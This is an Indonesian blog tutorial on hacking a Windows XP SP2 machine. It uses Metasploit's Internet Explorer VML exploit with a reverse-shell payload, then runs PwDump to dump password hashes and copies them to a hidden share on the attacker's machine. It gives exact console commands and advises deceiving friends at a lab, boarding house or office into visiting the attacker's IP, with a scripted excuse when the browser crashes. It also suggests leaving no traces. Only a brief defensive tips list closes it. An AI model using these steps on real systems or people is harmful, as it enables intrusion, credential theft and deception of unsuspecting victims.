Disclaimer:
This document was written in the interest of education. The author
cannot be held responsible for how the topics discussed in this
document are applied.

Setelah
mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang
dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit
pada bagian kedua, sekarang langsung aja kita praktek. Disini saya
sengaja menggunakan VMWare
untuk melakukan simulasi, karena tidak semua orang dapat
mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita
dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu
jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya.
Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete
environment for writing, testing, and using exploit code. This
environment provides a solid platform for penetrationtesting, shellcode
development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi
yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi
metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya
mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak
bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak
file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user
admin serta meletakkannya dimanapun tanpa harus menginstal di Folder
Program Files. Namun setelah sedikit dioprek, ternyata tidak harus
admin yang bisa menjalankan. Agak ribet dan males juga sih nulis
disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3,
kita dapat menjalankannya tanpa harus menginstall dengan user admin.
Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan
fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum
bisa dijalankan sepenuhnya.

Ok.. sekarang
saya asumsikan anda telah membaca userguide metasploit (ah.. paling
asumsi saya salah ;p). Biar lebih keliatan keren dan memahami
detailnya, saya menjelaskan metasplooit yang menggunakan console
(mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!



Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer
yang ingin dijadikan target adalah Windows XP SP2, maka digunakan
exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan
kelemahan pada Internet Explorer VML Fill Method Code Execution.

This
module exploits a code execution vulnerability in Microsoft Internet
Explorer using a buffer overflow in the VML processing code (VGX.dll).
This module has been tested on Windows 2000 SP4, Windows XP SP0, and
Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill
memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit
ini akan berpengaruh jika komputer target menjalankan IE dan
mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus
menggunakan sedikit ‘social engineering’, seperti jika di
kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba
membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE
ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1.
Biasanya setelah exploit ini dijalankan dan komputer target telah
terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan
exploit ‘bekerja’. Setelah beberapa saat bilang aja
“wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”.
Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit
di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga,
tapi setelah exploit bekerja ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :







Dalam contoh
diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan
komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang
digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default
http port). Setalah menjalankan perintah ‘exploit’, baru kita minta
komputer target untuk menjalankan IE dan mengarahkan url-nya ke
komputer kita. Proses ini akan memakan waktu agak lama, bahkan
terkadang tidak berhasil. Jadi coba-coba aja terus

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.





Crack da Password!

Nah, setelah
kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya.
Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password,
tapi karena ini remote maka kita harus ‘menyediakan’ program yg
dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada
komputer target user yang sedang login mempunyai akses admin. Klo user
yang digunakan komputer target yang dimanfaatkan IE-nya hanya user
‘biasa’, pwdump tidak akan berhasil!

Pertama kita
share dulu PwDump dari komputer kita dengan full access agar kita bisa
mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’
biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share
PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan
Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah
yang digunakan :







Setelah itu copy Pwdump ke komputer target
dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke
komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.



Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.





Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).



Sebenarnya masih banyak yang dapat dioprek
dari metasploit. Dalam metasploit terdapat banyak exploit, payload,
meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk
mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan
baik.





Happy Hacking…..



Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p